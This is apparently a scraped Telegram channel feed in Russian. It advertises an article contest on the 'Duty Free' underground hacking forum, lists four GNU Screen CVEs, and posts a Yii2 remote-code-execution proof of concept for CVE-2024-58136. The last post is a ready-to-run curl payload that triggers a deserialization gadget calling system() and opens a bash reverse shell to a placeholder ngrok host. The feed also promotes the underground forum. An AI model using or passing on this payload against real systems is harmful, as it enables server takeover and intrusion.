Forwarded from DutyNews 🤬🛡️
Мы устраиваем конкурс статей с призовым фондом в 12k$
Форум Duty Free расположился на 3 месте в рейтинге лучших русскоязычных андеграунд форумов, уступив место xss и exploit.
Если мы проводим конкурс без коммерческой выгоды - это значит мы поднялись.
Скорее принимай участие: https://forum.duty-free.cc/threads/290/
p/s авторы каналов сделайте репост, пожалуйста🤝
🔥 - много огней на этот пост и распространяйте и мы в следующий раз увеличим призовой фонд в 3 раза.
#pentest #redteam #bugbounty
✈️ @DutyFreeForum / forum.duty-free.cc
Форум Duty Free расположился на 3 месте в рейтинге лучших русскоязычных андеграунд форумов, уступив место xss и exploit.
Если мы проводим конкурс без коммерческой выгоды - это значит мы поднялись.
Скорее принимай участие: https://forum.duty-free.cc/threads/290/
p/s авторы каналов сделайте репост, пожалуйста🤝
🔥 - много огней на этот пост и распространяйте и мы в следующий раз увеличим призовой фонд в 3 раза.
#pentest #redteam #bugbounty
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11👍9😱2
GNU Screen !
*
CVE-2025-46802 -
CVE-2025-46803 -
CVE-2025-46804 -
CVE-2025-46805 -
Хоть в arch, хоть в ubuntu/debian, хоть freebsd
#multiplex
*
CVE-2025-46802 -
перехват устройства TTYCVE-2025-46803 -
выставление по умолчанию прав 0622 на устройство PTY, допускающих запись любым пользователям. Проблема проявляются только в ветке screen 5.0. CVE-2025-46804 -
утечка информации о наличии файлов и каталогов в закрытых каталогах (SCREENDIR)CVE-2025-46805 -
состояние гонки при отправке сигналов SIGCONT и SIGHUPХоть в arch, хоть в ubuntu/debian, хоть freebsd
#multiplex
👍28🔥9😱7
CVE-2024–58136 — RCE PoC
*
Yii2 Framework
*
Yii2 Framework
curl -k -X POST https://sub.domain.tld/index.php \
-H "Content-Type: application/json" \
-d '{"as hack": {"__class": "GuzzleHttp\\\\Psr7\\\\FnStream", "class": "yii\\\\behaviors\\\\AttributeBehavior", "__construct()": [[]], "_fn_close": "system", "stream": "bash -c '\''bash -i >& /dev/tcp/x.tcp.xx.ngrok.io/xxxx 0>&1'\''"}}'
👍33🔥23😱8